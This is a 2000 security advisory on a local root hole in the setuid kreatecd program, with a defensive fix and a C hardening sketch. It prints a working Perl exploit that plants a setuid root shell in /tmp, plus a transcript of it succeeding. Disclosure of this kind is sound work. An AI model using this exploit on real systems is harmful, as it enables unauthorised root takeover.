Linux kreatecd vulnerability lets local users gain root privileges
Published: 2000-03-18
Updated: 2000-03-18
Affected systems:
kreatecd
- Halloween Linux Version 4
- SuSE 6.x
Description:
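The kreatecd program, installed setuid root, blindly trusts the path to the
CD-recording software supplied by an ordinary user and executes the program at that
path with EUID=0. This may allow a local user to gain root privileges.
Because the path has to be set by clicking through the kreatecd menus, a remote
attacker can carry out the attack by displaying the remote host's kreatecd on a
local X server.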
<* Source: [1] S. Krahmer, C-Skills
http://www.cs.uni-potsdam.de/homepages/students/linuxer/
[2] TESO
http://teso.scene.at or https://teso.scene.at/
*>
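Test method:
WARNING
The following program (method) may be offensive in nature and is provided for security research and teaching only. Use at your own risk!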
[stealth@liane stealth]$ stat `which kreatecd`
File: "/usr/bin/kreatecd"
Size: 229068 Filetype: Regular File
Mode: (4755/-rwsr-xr-x) Uid: ( 0/ root) Gid: ( 0/ root)
Device: 3,1 Inode: 360053 Links: 1
Access: Tue Mar 14 14:48:21 2000(00000.00:00:45)
Modify: Tue Mar 14 14:48:21 2000(00000.00:00:45)
Change: Tue Mar 14 14:48:21 2000(00000.00:00:45)
[stealth@liane stealth]$ id
uid=500(stealth) gid=500(stealth) groups=500(stealth)
[stealth@liane stealth]$ /tmp/kreatur
(... some diagnostic messages ...)
Creating suid-maker...
Creating boom-shell...
Execute kreatecd and follow the menus:
Configure -> Paths -- change the path for cdrecord to /tmp/xxx
Apply -> OK
Configure -> SCSI -> OK
Execute /tmp/boomsh
BEHAVE!
(poking around with GUI...)
[stealth@liane stealth]$ /tmp/boomsh
[root@liane stealth]# id
uid=0(root) gid=500(stealth) groups=500(stealth)
[root@liane stealth]#
Test program: kreatur
#!/usr/bin/perl
# kreatecd local root-exploit helper script.
# Tested on Halloween 4 distro. Will also work on SuSE 6.x
# (C) 2000 C-skills development, S. Krahmer under the GPL
# http://www.cs.uni-potsdam.de/homepages/students/linuxer
#
# visit TESO at http://teso.scene.at/ or https://teso.scene.at/
#
# ! USE IT AT YOUR OWN RISK !
# For educational purposes only.
if (((stat "/opt/kde/bin/kreatecd")[2] & 04000) != 04000 &&
    ((stat "/usr/bin/kreatecd")[2] & 04000) != 04000) {
    print "kreatecd not installed suid! handshake with root!\n";
    exit 1;
}
print "kreatecd installed suid!\n";
print "Contact your local script-kiddie.\n";
print "Nobody ever got fired for NOT using GUI-suid-rootprograms! remove it!\n";
print "Creating suid-maker...\n";
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>
int main()
{
    setreuid(0,0);
    chown("/tmp/boomsh", 0, 0);
    chmod("/tmp/boomsh", 04755);
    exit(1);
}
_EOF_
close O;
system("cc /tmp/boom.c -o /tmp/xxx");
print "Creating boom-shell...\n";
open O, ">/tmp/boomsh.c" or die "open(boomsh.c..)";
print O<<_EOF2_;
int main()
{
    char *a[] = {
        "/bin/bash",
        0
    };
    setuid(0);
    execve(*a, a, 0);
    return 0;
}
_EOF2_
close O;
system("cc /tmp/boomsh.c -o /tmp/boomsh");
print <<_EOF3_;
\nExecute kreatecd and follow the menus:
Configure -> Paths -- change the path for cdrecord to /tmp/xxx
Apply -> OK
Configure -> SCSI -> OK
\nExecute /tmp/boomsh\n
\nBEHAVE!\n
_EOF3_
Recommendation:
chmod a-s `which kreatecd`
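Where a program has to remain setuid, the flaw described above (running a user-configured helper path with EUID=0) is avoided by checking that path or by giving up root before the exec. The C sketch below is an added example, not code from the advisory or from kreatecd; the function names and the trust policy (a file owned by trusted_uid in a directory only that user can write) are assumptions.

```c
#define _XOPEN_SOURCE 700
#include <libgen.h>
#include <limits.h>
#include <stdlib.h>
#include <string.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical check (not kreatecd code): 1 only if `path` is absolute, a regular
 * file, and neither it nor its directory is writable by anyone but trusted_uid. */
int helper_path_is_trusted(const char *path, uid_t trusted_uid)
{
    struct stat st;
    char dir[PATH_MAX];

    if (path == NULL || path[0] != '/' || strlen(path) >= sizeof dir)
        return 0;                       /* relative or oversized path */
    if (lstat(path, &st) != 0 || !S_ISREG(st.st_mode))
        return 0;                       /* missing, symlink, device, ... */
    if (st.st_uid != trusted_uid || (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;                       /* file replaceable by another user */
    strcpy(dir, path);
    if (stat(dirname(dir), &st) != 0 || st.st_uid != trusted_uid ||
        (st.st_mode & (S_IWGRP | S_IWOTH)))
        return 0;                       /* directory such as /tmp */
    return 1;
}

/* Permanently return to the invoking user: group first, then user, then verify
 * the drop took effect and that root cannot be regained. */
int drop_privileges(void)
{
    uid_t ruid = getuid();
    gid_t rgid = getgid();

    if (setgid(rgid) != 0 || setuid(ruid) != 0 ||
        geteuid() != ruid || getegid() != rgid)
        return -1;
    return (ruid != 0 && setuid(0) == 0) ? -1 : 0;
}

/* Hypothetical launcher: keep EUID 0 only for a root-owned helper in a
 * root-only directory; anything else runs as the user, or not at all. */
int launch_helper(const char *path, char *const argv[])
{
    if (!helper_path_is_trusted(path, 0) && drop_privileges() != 0)
        return -1;
    execv(path, argv);
    return -1;                          /* exec itself failed */
}
```

The check covers only the file and its immediate directory, and the file could still be swapped between the check and the exec, so it narrows the exposure rather than replacing the recommendation to remove the setuid bit.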